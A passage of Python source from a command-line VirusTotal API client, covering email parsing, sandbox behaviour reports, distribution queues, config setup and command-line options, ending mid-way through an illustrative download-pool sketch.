original_email def email_remove_bad_char(self, email): ''' I saw few emails which start with ">" and they not parsed correctly''' try: if email.startswith(b'>'): email = email[1:] except Exception as e: print(e) return email def parse_email(self, *args, **kwargs): msg = '' email_dict = dict() def re_compile_our(*pattern): return re_compile_orig(pattern[0].replace("?P<end>--", "?P<end>--+")) if kwargs.get('value'): result, name = is_file(kwargs.get('value')) if result: msg = load_file(name) kwargs['dump'] = False for email_id in kwargs.get('value'): if os.path.exists(email_id): email_id = open(email_id, 'rb').read() else: if email_id.startswith(b'http'): email_id = re.findall('[\w\d]{64}', email_id, re.I) if email_id: email_id = email_id[0] else: print('[-] Hash not found in url') if len(email_id) in (32, 40, 64): # md5, sha1, sha256 email_id = self.__download_email(email_id, *args, **kwargs) elif isinstance(email_id, str): email_id = {"email": email_id} elif isinstance(email_id, bytes): email_id = {"email": email_id} #.decode('utf-8') try: for email__id in email_id: email__id = email_id[email__id] email__id = self.email_remove_bad_char(email__id) # save if kwargs.get('download'): if kwargs.get('name'): self.__name_auxiliar(*args, **kwargs) else: name = hashlib.sha256( email__id.encode('utf-8') ).hexdigest() + '.eml' # save email save_email = open(name, 'wb') save_email.write(email__id) save_email.close() re.compile = re_compile_our msg = email.message_from_string(email__id.decode("latin-1")) re.compile = re_compile_orig except Exception as e: print(e) return '' if msg: email_dict = dict() email_dict.setdefault("email_id", hashlib.sha256(email__id).hexdigest()) email_dict['Attachments'] = list() for k, v in msg.items(): email_dict[k] = v for part in msg.walk(): attachment, name, size, content_type, sha256_hash, sha1_hash, md5_hash = self.__email_parse_attachment(part) if attachment: email_dict['Attachments'].append({ 'attachment': attachment, 'name': name, 'size': size, 'content_type': content_type, 'sha256': sha256_hash, 'sha1': sha1_hash, 'md5': md5_hash }) elif part.get_content_type() == "text/plain": email_dict['Body'] = part.get_payload(decode=True) elif part.get_content_type() == "text/html": email_dict['Body_html'] = part.get_payload(decode=True) if not kwargs.get('return_json'): self.__email_print( email_dict, hashlib.sha256(email__id).hexdigest(), #.encode('utf-8') *args, **kwargs ) return email_dict def parse_email_outlook(self, *args, **kwargs): if OUTLOOK_prsr: email_dict = dict() for email_id in kwargs.get('value'): if len(email_id) in (32, 40, 64): # md5, sha1, sha256 email_id = self.__download_email(email_id, *args, **kwargs) else: email_id = dict() for value in kwargs.get('value'): email_id.update({value: value}) try: for email_hash in email_id: if kwargs.get('download', False): if kwargs.get('name'): self.__name_auxiliar(args, kwargs) else: name = hashlib.sha256(email_id.encode('utf-8')).hexdigest() + '.eml' # save email save_email = open(name, 'wb') save_email.write(email_id[email_hash]) save_email.close() msg = OUTLOOK(email_id[email_hash]) email_dict.update(msg.parse_outlook_email()) if not kwargs.get('return_json'): self.__email_print( email_dict, email_id[email_hash], *args, **kwargs ) except IOError: return {'status': 'Not OLE file'} if kwargs.get('return_json'): return email_dict return {'status': 'missed library'} # ToDo dist remove def distribution(self, *args, **kwargs): """ Note that scan items are not kept forever in the distribution queue, they are 
automatically removed after 6 hours counting from the time they were put in the queue. You have a 6 hours time frame to get an item from the queue. The timestamp property value is what you need to iterate through your queue using the before and after call parameters. """ jdata = '' if kwargs.get('value'): result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) kwargs['dump'] = False else: if kwargs.get('before'): self.params['before'] = kwargs.get('before') if kwargs.get('after'): self.params['after'] = kwargs.get('after') if kwargs.get('limit'): self.params['limit'] = kwargs.get('limit') if kwargs.get('action') == 'file': if kwargs.get('reports'): self.params['reports'] = str(kwargs.get('reports')).lower() url = self.base.format('file/distribution') elif kwargs.get('action') == 'url': if kwargs.get('allinfo'): self.params['allinfo'] = '1' url = self.base.format('url/distribution') jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata simple_list = ( 'md5', 'sha1', 'sha256', 'pe-imphash', 'authentihash', 'size', 'filetype', 'peid' 'source_id', 'first_seen', 'last_seen', 'scan_date', 'score', 'timestamp', 'url', 'pe-entry-point', 'pe-machine-type' ) for vt_file in jdata: if _check_error(jdata): return if kwargs.get('action') == 'file': self.simple_print(vt_file, simple_list) if vt_file.get('report'): plist = [[]] for key in vt_file['report']: plist.append( [key, 'True' if jdata[0]['report'][key][0] else 'False', jdata[0]['report'][key][1], jdata[0]['report'][key][2]]) pretty_print_special(plist, ['Vendor name', 'Detection', 'Version', 'Update'], False, False, kwargs.get('email_template')) if vt_file.get('link'): print('\nLink : {link}'.format(link=vt_file['link'])) elif kwargs.get('action') == 'url': for key in simple_list: if vt_file.get(key): try: self.print_key(key, indent='\n\n', separator='') print(vt_file[key]) except UnicodeEncodeError: print('') print('\nDetections:\n\t{positives}/{total} Positives/Total\n'.format(positives=vt_file.get('positives', 0), total=vt_file.get('total'))) if vt_file.get('additional_info'): print('\n\nAdditional info:') plist = [[]] for key in vt_file.get('additional_info'): if isinstance(vt_file['additional_info'][key], dict): plist.append([key, ''.join(['{key_temp}:{value}\n'.format( key_temp=key_temp, value=vt_file['additional_info'][key][key_temp]) for key_temp in vt_file['additional_info'][key]])]) elif isinstance(vt_file['additional_info'][key], list): plist.append( [key, '\n'.join(vt_file['additional_info'][key])]) else: plist.append([key, vt_file['additional_info'][key]]) pretty_print_special(plist, ['Name', 'Value'], [40, 70], False, kwargs.get('email_template')) if vt_file.get('scans'): plist = [[]] for key in vt_file['scans']: plist.append([key, 'True' if vt_file['scans'][key]['detected'] else 'False', vt_file['scans'][key]['result']]) if plist != [[]]: pretty_print_special(plist, ['Vendor name', 'Detection', 'Result'], False, False, kwargs.get('email_template')) if vt_file.get('permalink'): print('\nPermanent link : {link}\n'.format(link=vt_file['permalink'])) if kwargs.get('dump'): jsondump(jdata, 'distribution_{date}'.format( date=time.strftime("%Y-%m-%d")) ) # ToDo in search intel? 
def behaviour(self, *args, **kwargs): # ToDo """ u'behavior.processtree', u'info.started', u'info.version', u'network.dns', u'network.hosts', u'network.http', u'network.tcp', u'network.udp'] """ return_json = dict() result, name = is_file(kwargs.get('value')[0]) if result: jdata = load_file(name) kwargs['dump'] = False else: self.params['hash'] = kwargs.get('value')[0] url = self.base.format('file/behaviour') jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata if _check_error(jdata): return if jdata.get('info') and (kwargs.get('info') or 'info' in args): if kwargs.get('return_json'): return_json.update({'info': jdata['info']}) else: print('\nInfo\n') pretty_print(jdata['info'], ['started', 'ended', 'duration', 'version']) if (kwargs.get('behavior_network') or 'behavior_network' in args) or kwargs.get('verbose'): if jdata.get('network'): print('\nHTTP requests\n') if 'behavior-network' in jdata and 'http' in jdata.get('network'): if kwargs.get('return_json'): return_json.update({'http':jdata['network']['http']}) else: simple_list = ( 'uri', 'host', 'port', 'path', 'method', 'user-agent', 'version', 'data' ) for http in jdata['network']['http']: self.simple_print(http, simple_list) # if http.get('data') : print 'data : {0}'.format(http['data'].replace('\r\n\r\n', '\n\t').replace('\r\n','\n\t\t')) if http.get('body'): print('\tbody hex encoded:\n\t {}\n'.format(http['body'].encode('hex'))) if jdata['network'].get('hosts'): if kwargs.get('return_json'): return_json.update({'hosts': jdata['network']['hosts']}) else: pretty_print(jdata['network']['hosts'], ['hosts'], False, False, kwargs.get('email_template')) if jdata['network'].get('dns'): if kwargs.get('return_json'): return_json.update({'dns': jdata['network']['dns']}) else: print('\nDNS requests\n') pretty_print(jdata['network']['dns'], ['ip', 'hostname'], False, False, kwargs.get('email_template')) simple_list = ( 'tcp', 'upd' ) for key in simple_list: if jdata['network'].get(key): if kwargs.get('return_json'): return_json.update({key: jdata['network'][key]}) else: print('\n{0} Connections'.format(key.upper())) unique = [] for block in jdata['network'][key]: if not [block['src'], block['dst'], block['sport'], block['dport']] in unique: unique.append([block['src'], block['dst'], block['sport'], block['dport']]) pretty_print_special(unique, ['src', 'dst', 'sport', 'dport'], False, False, kwargs.get('email_template')) del unique if (kwargs.get('behavior_process') or 'behavior_process' in args) or kwargs.get('verbose'): if jdata.get('behavior'): if kwargs.get('return_json'): return_json.update({'processes': jdata['behavior']['processes']}) else: print('\n[+] Behavior') print('\n[+] Processes') for process_id in jdata['behavior']['processes']: plist = [] simple_list = ( 'parent_id', 'process_id', 'process_name' ) self.simple_print(process_id, simple_list) if process_id.get('first_seen'): print('First Seen : {0}'.format(datetime.strptime(process_id['first_seen'][:14], '%Y%m%d%H%M%S').strftime('%Y:%m:%d %H:%M:%S'))) if process_id.get('calls'): for process_part in process_id['calls']: plist = [[]] for key in process_part: if isinstance(process_part[key], list): if process_part[key] != [] and isinstance(process_part[key][0], dict): temp_list = [] for part in process_part[key]: temp_list.append('\n'.join(['{key_temp}:{value}\n'.format(key_temp=key_temp, value=part[key_temp]) for key_temp in list(part.keys())])) plist.append([key, ''.join(temp_list)]) del temp_list else: plist.append([key, 
'\n'.join(process_part[key])]) elif isinstance(process_part[key], dict): temp_list = [] for part in process_part[key]: temp_list += ['{key_temp}:{value}\n'.format(key_temp=key_temp, value=part[key_temp]) for key_temp in list(part.keys())] plist.append([key, ''.join(temp_list)]) del temp_list else: plist.append([key, process_part[key]]) pretty_print_special(plist, ['Name', 'Value'], [10, 50], False, kwargs.get('email_template')) del plist print('\n' + '=' * 20 + ' FIN ' + '=' * 20) print('\n[+] Process Tree\n') if jdata.get('behavior') and jdata['behavior'].get('processtree'): for tree in jdata['behavior']['processtree']: for key in tree.keys(): print('\t{key}:{value}'.format(key=key, value=tree[key])) print('\n') if (kwargs.get('behavior_summary') or 'behavior_summary' in args) or kwargs.get('verbose'): if jdata.get('behavior') and jdata['behavior'].get('summary'): simple_tt_list = ( 'files', 'keys', 'mutexes' ) for key in simple_tt_list: if jdata['behavior']['summary'].get(key): if kwargs.get('return_json'): return_json.update({key: jdata['behavior']['summary'][key]}) else: if jdata['behavior']['summary']['files']: self.simple_print(jdata['behavior']['summary'], [key]) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json def last_analysis_results(self, jdata, *args, **kwargs): sorted_data = sorted(jdata["last_analysis_results"]) for engine in sorted_data: self.print_key(engine, indent='\n', separator='[+]') pretty_print(jdata["last_analysis_results"][engine], [ 'category', 'engine_update', 'engine_version', 'method', 'result'], [15, 15, 20, 20, 10], ['c', 'c', 'c', 'c', 'c'], kwargs.get('email_template')) def __detected_samples(self, jdata, *args, **kwargs): if kwargs.get('samples') or 'samples' in args: kwargs['detected_downloaded_samples'] = \ kwargs['undetected_downloaded_samples'] = \ kwargs['detected_referrer_samples'] = \ kwargs['undetected_referrer_samples'] = \ kwargs['detected_communicated'] = \ kwargs['undetected_communicated'] = True simple_list = ( 'detected_downloaded_samples', 'undetected_downloaded_samples', 'detected_communicating_samples', 'undetected_communicating_samples', 'detected_referrer_samples', 'undetected_referrer_samples', ) return_json = dict() for key in simple_list: if jdata.get(key) and ((kwargs.get(key) or 'key' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.print_key(key, indent='\n', separator='[+]') print('\n') if isinstance(jdata[key][0].get("date", None), type(None)): sorted_data = jdata[key] else: sorted_data = sorted(jdata[key], key=methodcaller('get', 'date'), reverse=True) pretty_print(sorted_data, [ 'positives', 'total', 'date', 'sha256'], [15, 10, 20, 70], ['c', 'c', 'c', 'c'], kwargs.get('email_template')) if jdata.get('detected_urls') and ((kwargs.get('detected_urls') or 'detected_urls' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'detected_urls': jdata['detected_urls']}) else: url_size = max([len(url['url']) for url in jdata['detected_urls']]) if url_size > 80: url_size = 80 print('\n[+] Latest detected URLs\n') pretty_print(sorted(jdata['detected_urls'], key=methodcaller('get', 'scan_date'), reverse=True), [ 'positives', 'total', 'scan_date', 'url'], [9, 5, 20, url_size], ['c', 'c', 'c', 'l'], kwargs.get('email_template')) if kwargs.get('return_json'): return return_json def create_config_file(paths): path = False conf_template = """ [vt] 
apikey={} type={} intelligence={} engines=malwarebytes,kaspersky,drweb,eset_nod32 timeout=60 # It should be set to: 10/50/100/500/1000/5000/10000 daily_limit=100 """ while True: print("[+] Config setup start") for key, value in paths.items(): print("\t[{}] {}".format(key, value)) path = six.moves.input("[+] Select option, where you want to create config, or type custom path: ") path = path.strip() if path.isdigit(): path = int(path) if path in paths: path = os.path.expanduser(paths[path]) else: print("[-] Incorrect config path") continue apikey = six.moves.input("[+] Provide your apikey: ").encode('ascii') type_key = six.moves.input("[+] Your apikey is pubic/private: ").encode('ascii') intelligence = six.moves.input("[+] You have access to VT intelligence True/False: ").encode('ascii') if sys.version_info.major == 3: apikey = apikey.decode("utf-8") type_key = type_key.decode("utf-8") intelligence = intelligence.decode("utf-8") try: tmp = open(path, "w") tmp.write(conf_template.format(apikey, type_key, intelligence)) tmp.close() print("[+] Config created at: {}".format(path)) break except Exception as e: print(e) return path def read_conf(config_file = False): global proxies vt_config = {'intelligence': False, 'apikey': '', 'type': False} paths = { 0:'.vtapi', 1:'vtapi.conf', 2:'~/.vtapi', 3:'~/vtapi.conf' } help = ''' No API key provided or cannot read ~ /.vtapi. Specify an API key in vt.py or in ~ /.vtapi. Format: [vt] apikey=your-apikey-here type=public #private if you have private api intelligence=False # True if you have access engines=microsoft,malwarebytes,kaspersky,drweb,eset_nod32 timeout=60 # ex: http://localhost:8118 proxy= For more information check: https://github.com/doomedraven/VirusTotalApi ''' if not config_file: # config in home or in local dirrectory for conf in paths.values(): if os.path.exists(os.path.expanduser(conf)): config_file = conf break if not config_file: config_file = create_config_file(paths) try: confpath = os.path.expanduser(config_file) if os.path.exists(confpath): config = six.moves.configparser.RawConfigParser() config.read(confpath) if config.has_section('vt'): vt_config = dict(config.items('vt')) if not vt_config.get('apikey'): sys.exit(help) else: sys.exit('\nFile {0} don\'t exists\n'.format(confpath)) except Exception: sys.exit(help) if "proxy" in vt_config and vt_config["proxy"]: proxies = { "http": vt_config["proxy"], "https": vt_config["proxy"] } for key in vt_config: #backward compartibility if key == 'type': if vt_config[key].lower() == 'private': apitype = True else: apitype = False key = 'api_type' vt_config[key] = apitype del vt_config['type'] del apitype if vt_config[key] in ('False', 'True'): vt_config[key] = ast.literal_eval(vt_config[key]) return vt_config def main(): global apikey vt_config = read_conf() if vt_config.get('timeout'): global req_timeout req_timeout = int(vt_config.get('timeout')) opt = argparse.ArgumentParser('value', description='Scan/Search/ReScan/JSON parse') opt.add_argument('-fi', '--file-info', action='store_true', help='Get PE file info, all data extracted offline, for work you need have installed PEUTILS library') opt.add_argument('-udb', '--userdb', action='store', help='Path to your userdb file, works with --file-info option only') opt.add_argument('value', nargs='*', help='Enter the Hash, Path to File(s) or Url(s)') opt.add_argument('-fs', '--file-search', action='store_true', help='File(s) search, this option, don\'t upload file to VirusTotal, just search by hash, support linux name wildcard, example: 
/home/user/*malware*, if file was scanned, you will see scan info, for full scan report use verbose mode, and dump if you want save already scanned samples') opt.add_argument('-f', '--file-scan', action='store_true', dest='files', help='File(s) scan, support linux name wildcard, example: /home/user/*malware*, if file was scanned, you will see scan info, for full scan report use verbose mode, and dump if you want save already scanned samples') opt.add_argument('-fr', '--file-scan-recursive', action='store_true', dest='files', help='Recursive dir walk, use this insted of --file-scan if you want recursive') opt.add_argument('-u', '--url-scan', action='store_true', help='Url scan, support space separated list, Max 4 urls (or 25 if you have private api), but you can provide more urls, for example with public api, 5 url - this will do 2 requests first with 4 url and other one with only 1, or you can specify file filename with one url per line') opt.add_argument('-ur', '--url-report', action='store_true', help='Url(s) report, support space separated list, Max 4 (or 25 if you have private api) urls, you can use --url-report --url-scan options for analysing url(s) if they are not in VT data base, read previev description about more then max limits or file with urls') opt.add_argument('-d', '--domain-info', action='store_true', dest='domain', help='Retrieves a report on a given domain. It will retrieve all relationships data') opt.add_argument('-dpc', '--domain-post-comments', action='store', help='Add comment(s) for an domain name') opt.add_argument('-dgc', '--domain-get-comments', action='store_true', help='Get comment(s) for an domain name') opt.add_argument('-i', '--ip-info', action='store_true', dest='ip', help='A valid IPv4 address in dotted quad notation, for the time being only IPv4 addresses are supported., It will retrieve all relationships data') opt.add_argument('-ipc', '--ip-post-comments', action='store', help='Add comment(s) for an IP address') opt.add_argument('-igc', '--ip-get-comments', action='store_true', help='Get comment(s) for an IP address') opt.add_argument('-w', '--walk', action='store_true', default=False, help='Work with domain-info, will walk throuth all detected ips and get information, can be provided ip parameters to get only specific information') opt.add_argument('-s', '--search', action='store_true', help='A md5/sha1/sha256 hash for which you want to retrieve the most recent report. You may also specify a scan_id (sha256-timestamp as returned by the scan API) to access a specific report. You can also specify a space separated list made up of a combination of hashes and scan_ids Public API up to 4 items/Private API up to 25 items, this allows you to perform a batch request with one single call.') opt.add_argument('-si', '--search-intelligence', action='store_true', help='Search query, help can be found here - https://www.virustotal.com/intelligence/help/') opt.add_argument('-sil', '--search-intelligence-limit', action='store', default=1, type=int, help='limit search intelligence paging, 300 hashes per page, default 1 page') opt.add_argument('-et', '--email-template', action='store_true', help='Table format template for email') if vt_config.get('api_type'): allinfo_opt = opt.add_argument_group('All information related') allinfo_opt.add_argument('-rai', '--report-all-info', action='store_true', help='If specified and set to one, the call will return additional info, other than the antivirus results, on the file being queried. 
This additional info includes the output of several tools acting on the file (PDFiD, ExifTool, sigcheck, TrID, etc.), metadata regarding VirusTotal submissions (number of unique sources that have sent the file in the past, first seen date, last seen date, etc.), and the output of in-house technologies such as a behavioural sandbox.') allinfo_opt.add_argument('-itu', '--ITW-urls', action='store_true', help='In the wild urls') allinfo_opt.add_argument('-cw', '--compressedview', action='store_true', help='Contains information about extensions, file_types, tags, lowest and highest datetime, num children detected, type, uncompressed_size, vhash, childrens') allinfo_opt.add_argument('-dep', '--detailed-email-parents', action='store_true', help='Contains information about emails, as Subject, sender, receiver(s), full email, and email hash to download it') allinfo_opt.add_argument('-eo', '--email-original', default=False, action='store_true', help='Will retreive original email and process it') allinfo_opt.add_argument('-snr', '--snort', action='store_true', help='Get Snort results') allinfo_opt.add_argument('-srct', '--suricata', action='store_true', help='Get Suricata results') allinfo_opt.add_argument('-tir', '--traffic-inspection', action='store_true', help='Get Traffic inspection info') allinfo_opt.add_argument('-wir', '--wireshark-info', action='store_true', help='Get Wireshark info') allinfo_opt.add_argument('-rbgi', '--rombios-generator-info', action='store_true', help='Get RomBios generator info') allinfo_opt.add_argument('-rbi', '--rombioscheck-info', action='store_true', help='Get RomBiosCheck info') allinfo_opt.add_argument('-agi', '--androidguard-info', action='store_true', help='Get AndroidGuard info') allinfo_opt.add_argument('-dbc', '--debcheck-info', action='store_true', help='Get DebCheck info, also include ios IPA') opt.add_argument('-ac', '--add-comment', action='store_true', help='The actual review, you can tag it using the "#" twitter-like syntax (e.g. #disinfection #zbot) and reference users using the "@" syntax (e.g. @VirusTotalTeam). supported hashes MD5/SHA1/SHA256') opt.add_argument('-gc', '--get-comments', action='store_true', help='Either a md5/sha1/sha256 hash of the file or the URL itself you want to retrieve') if vt_config.get('api_type'): opt.add_argument('--get-comments-before', action='store', dest='date', default=False, help='A datetime token that allows you to iterate over all comments on a specific item whenever it has been commented on more than 25 times. 
Token format 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00') opt.add_argument('-v', '--verbose', action='store_true', dest='verbose', help='Turn on verbosity of VT reports') opt.add_argument('-j', '--dump', action='store_true', help='Dumps the full VT report to file (VTDL{md5}.json), if you (re)scan many files/urls, their json data will be dumped to separetad files') opt.add_argument('--csv', action='store_true', default = False, help='Dumps the AV\'s detections to file (VTDL{scan_id}.csv)') opt.add_argument('-rr', '--return-raw', action='store_true', default = False, help='Return raw json, in case if used as library and want parse in other way') opt.add_argument('-rj', '--return-json', action='store_true', default = False, help='Return json with parts activated, for example -p for pasive dns, etc') opt.add_argument('-V', '--version', action='store_true', default = False, help='Show version and exit') rescan = opt.add_argument_group('Rescan options') rescan.add_argument('-r', '--rescan', action='store_true', help='Allows you to rescan files in VirusTotal\'s file store without having to resubmit them, thus saving bandwidth, support space separated list, MAX 25 hashes, can be local files, hashes will be generated on the fly, support linux wildmask') if vt_config.get('api_type'): rescan.add_argument('--delete', action='store_true',help='A md5/sha1/sha256 hash for which you want to delete the scheduled scan') rescan.add_argument('--date', action='store', dest='date',help='A Date in one of this formats (example: 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00) in which the rescan should be performed. If not specified the rescan will be performed immediately.') rescan.add_argument('--period', action='store',help='Period in days in which the file should be rescanned. If this argument is provided the file will be rescanned periodically every period days, if not, the rescan is performed once and not repated again.') rescan.add_argument('--repeat', action='store',help='Used in conjunction with period to specify the number of times the file should be rescanned. If this argument is provided the file will be rescanned the given amount of times, if not, the file will be rescanned indefinitely.') if vt_config.get('api_type'): scan_rescan = opt.add_argument_group('File scan/Rescan shared options') scan_rescan.add_argument('--notify-url', action='store', help='An URL where a POST notification should be sent when the scan finishes.') scan_rescan.add_argument('--notify-changes-only', action='store_true', help='Used in conjunction with --notify-url. 
Indicates if POST notifications should be sent only if the scan results differ from the previous one.') domain_opt = opt.add_argument_group( 'Domain/IP shared verbose mode options, by default just show resolved IPs/Passive DNS') domain_opt.add_argument('-wh', '--whois', action='store_true', default=False, help='Whois data') domain_opt.add_argument('-wht', '--whois-timestamp', action='store_true', default=False, help='Whois timestamp') domain_opt.add_argument('-pdns', '--resolutions', action='store_true', default=False, help='Passive DNS resolves') domain_opt.add_argument('--asn', action='store_true', default=False, help='ASN number') domain_opt.add_argument('-aso', '--as-owner', action='store_true', default=False, help='AS details') domain_opt.add_argument('--country', action='store_true', default=False, help='Country') domain_opt.add_argument('--subdomains', action='store_true', default=False, help='Subdomains') domain_opt.add_argument('--domain-siblings', action='store_true', default=False, help='Domain siblings') domain_opt.add_argument('-cat','--categories', action='store_true', default=False, help='Categories') domain_opt.add_argument('-alc', '--alexa-cat', action='store_true', default=False, help='Alexa category') domain_opt.add_argument('-alk', '--alexa-rank', action='store_true', default=False, help='Alexa rank') domain_opt.add_argument('-opi', '--opera-info', action='store_true', default=False, help='Opera info') domain_opt.add_argument('--drweb-cat', action='store_true', default=False, help='Dr.Web Category') domain_opt.add_argument('-adi', '--alexa-domain-info', action='store_true', default=False, help='Just Domain option: Show Alexa domain info') domain_opt.add_argument('-wdi', '--wot-domain-info', action='store_true', default=False, help='Just Domain option: Show WOT domain info') domain_opt.add_argument('-tm', '--trendmicro', action='store_true', default=False, help='Just Domain option: Show TrendMicro category info') domain_opt.add_argument('-wt', '--websense-threatseeker', action='store_true', default=False, help='Just Domain option: Show Websense ThreatSeeker category') domain_opt.add_argument('-bd', '--bitdefender', action='store_true', default=False, help='Just Domain option: Show BitDefender category') domain_opt.add_argument('-wd', '--webutation-domain', action='store_true', default=False, help='Just Domain option: Show Webutation domain info') domain_opt.add_argument('-du', '--detected-urls', action='store_true', default=False, help='Just Domain option: Show latest detected URLs') domain_opt.add_argument('--pcaps', action='store_true', default=False, help='Just Domain option: Show all pcaps hashes') domain_opt.add_argument('--samples', action='store_true', help='Will activate -dds -uds -dc -uc -drs -urs') domain_opt.add_argument('-dds', '--detected-downloaded-samples', action='store_true', default=False, help='Domain/Ip options: Show latest detected files that were downloaded from this ip') domain_opt.add_argument('-uds', '--undetected-downloaded-samples', action='store_true', default=False, help='Domain/Ip options: Show latest undetected files that were downloaded from this domain/ip') domain_opt.add_argument('-dc', '--detected-communicated', action='store_true', default=False, help='Domain/Ip Show latest detected files that communicate with this domain/ip') domain_opt.add_argument('-uc', '--undetected-communicated', action='store_true', default=False, help='Domain/Ip Show latest undetected files that communicate with this domain/ip') domain_opt.add_argument('-drs', 
'--detected-referrer-samples', action='store_true', default=False, help='Undetected referrer samples') domain_opt.add_argument('-urs', '--undetected-referrer-samples', action='store_true', default=False, help='Undetected referrer samples') email_opt = opt.add_argument_group('Process emails') email_opt.add_argument('-pe', '--parse-email', action='store_true', default=False, help='Parse email, can be string or file') email_opt.add_argument('-esa', '--save-attachment', action='store', default=False, help='Save email attachment, path where to store') email_opt.add_argument('-peo', '--parse-email-outlook', action='store_true', default=False, help='Parse outlook .msg, can be string or file') if vt_config.get('api_type'): behaviour = opt.add_argument_group('Behaviour options') behaviour.add_argument('-bh', '--behaviour', action='store_true', help='The md5/sha1/sha256 hash of the file whose dynamic behavioural report you want to retrieve.\ VirusTotal runs a distributed setup of Cuckoo sandbox machines that execute the files we receive. Execution is attempted only once, upon\ first submission to VirusTotal, and only Portable Executables under 10MB in size are ran. The execution of files is a best effort process,\ hence, there are no guarantees about a report being generated for a given file in our dataset. a file did indeed produce a behavioural report,\ a summary of it can be obtained by using the file scan lookup call providing the additional HTTP POST parameter allinfo=1. The summary will\ appear under the behaviour-v1 property of the additional_info field in the JSON report.This API allows you to retrieve the full JSON report\ of the files execution as outputted by the Cuckoo JSON report encoder.') behaviour.add_argument('-bn', '--behavior-network', action='store_true', help='Show network activity') behaviour.add_argument('-bp', '--behavior-process', action='store_true', help='Show processes') behaviour.add_argument('-bs', '--behavior-summary', action='store_true', help='Show summary') if vt_config.get('api_type') or vt_config.get('intelligence'): downloads = opt.add_argument_group('Download options') downloads.add_argument('-dl', '--download', dest='download', action='store_const', const='file', default=False, help='The md5/sha1/sha256 hash of the file you want to download or txt file with .txt extension, with hashes, or hash and type, one by line, for example: hash,pcap or only hash. Will save with hash as name, can be space separated list of hashes to download') downloads.add_argument('-nm', '--name', action='store', default="", help='Name with which file will saved when download it') downloads.add_argument('-dt', '--download-threads', action='store', default=5, type=int, help='Number of simultaneous downloaders') if vt_config.get('api_type'): more_private = opt.add_argument_group('Additional options') more_private.add_argument('--pcap', dest='download', action='store_const', const='pcap', default=False, help='The md5/sha1/sha256 hash of the file whose network traffic dump you want to retrieve. 
Will save as hash.pcap') more_private.add_argument('--clusters', action='store_true',help='A specific day for which we want to access the clustering details, example: 2013-09-10') # more_private.add_argument('--search-by-cluster-id', action='store_true', help=' the id property of each cluster allows users to list files contained in the given cluster, example: vhash 0740361d051)z1e3z 2013-09-10') more_private.add_argument('--distribution-files', action='store_true', help='Timestamps are just integer numbers where higher values mean more recent files. Both before and after parameters are optional, if they are not provided the oldest files in the queue are returned in timestamp ascending order.') more_private.add_argument('--distribution-urls', action='store_true', help='Timestamps are just integer numbers where higher values mean more recent urls. Both before and after parameters are optional, if they are not provided the oldest urls in the queue are returned in timestamp ascending order.') if vt_config.get('api_type'): dist = opt.add_argument_group('Distribution options') dist.add_argument('--before', action='store', help='File/Url option. Retrieve files/urls received before the given timestamp, in timestamp descending order.') dist.add_argument('--after', action='store', help='File/Url option. Retrieve files/urls received after the given timestamp, in timestamp ascending order.') dist.add_argument('--reports', action='store_true', default=False, help='Include the files\' antivirus results in the response. Possible values are \'true\' or \'false\' (default value is \'false\').') dist.add_argument('--limit', action='store', help='File/Url option. Retrieve limit file items at most (default: 1000).') dist.add_argument('--allinfo', action='store_true', help='will include the results for each particular URL scan (in exactly the same format as the URL scan retrieving API). If the parameter is not specified, each item returned will onlycontain the scanned URL and its detection ratio.') options = opt.parse_args() if options.version: print('Version:', __version__) print('Current path:', os.path.dirname(os.path.realpath(__file__))) sys.exit() options = vars(options) apikey = vt_config.get('apikey') vt = vtAPI() options.update(vt_config) if options.get('date', ""): options['date'] = options['date'].replace( '-', '').replace(':', '').replace(' ', '') if options.get('files') or options.get('file_scan_recursive'): options.update({'scan': True}) vt.fileScan(**options) elif options['file_info']: vt.fileInfo(**options) elif options['file_search']: options.update({'scan': False}) vt.fileScan(**options) elif options.get('url_scan') and not options.get('url_report'): options.update({'key': 'scan'}) vt.url_scan_and_report(**options) elif options.get('url_report'): options.update({'action': 0}) if options['url_scan']: options.update({'action': 1}) options.update({'key': 'report'}) vt.url_scan_and_report(**options) elif options.get('rescan'): if options.get('date', ""): if len(options['date']) < 14: print('\n[!] Date format is: 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00\n') sys.exit() now = time.strftime("%Y:%m:%d %H:%M:%S") if now >= relativedelta(options['date']): print('\n[!] 
Date must be greater then today\n') sys.exit() vt.rescan(**options) elif options.get('domain') or options.get('ip'): if 'http' in options['value'][0]: options['value'][0] = urlparse(options['value'][0]).netloc if match('\w{1,3}\.\w{1,3}\.\w{1,3}\.\w{1,3}', options['value'][0]): vt.getIP(**options) else: vt.getDomain(**options) elif options.get('report_all_info'): options.update({'allinfo': 1}) vt.getReport(**options) elif (options.get('search') or options.get('search_intelligence')) and \ not options['domain'] and not options['ip'] and not options['url_scan'] and \ not options['url_report']: options.update({'allinfo': 0}) vt.getReport(**options) elif options.get('download') and not (options.get('parse_email') or options.get('parse_email_outlook')): vt.download(**options) elif options.get('parse_email'): vt.parse_email(**options) elif options.get('parse_email_outlook'): vt.parse_email_outlook(**options) elif options.get('behaviour'): vt.behaviour(**options) elif options.get('distribution_files'): options.update({'action': 'file'}) vt.distribution(**options) elif options.get('distribution_urls'): options.update({'action': 'url'}) vt.distribution(**options) elif options.get('add_comment') and len(options['value']) == 2: options.update({'action': 'add'}) vt.comment(**options) elif options.get('get_comments'): options.update({'action': 'get'}) vt.comment(**options) elif options.get('clusters'): vt.clusters(**options) # elif options.search_by_cluster_id: # vt.clusters(options.value, options.dump, True) if __name__ == '__main__': main()
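# --- Illustrative sketch (not part of the original script) -----------------
# The download()/__downloader() pair above implements a small worker pool:
# the requested hashes sit in a collections.deque shared by a handful of
# daemon threads, and a threading.Event acts as a cooperative run flag
# (workers loop while it is set). The self-contained variant below mirrors
# that shape with a placeholder fetch callable; "fetch_one" and "hashes"
# are illustrative assumptions, not part of the VirusTotal API or this tool.
def _download_pool_sketch(hashes, fetch_one, num_threads=5):
    """Drain `hashes` with a small pool of daemon threads."""
    import collections
    import threading

    work = collections.deque(hashes)
    run_flag = threading.Event()
    run_flag.set()  # cleared below to ask the workers to wind down early

    def worker():
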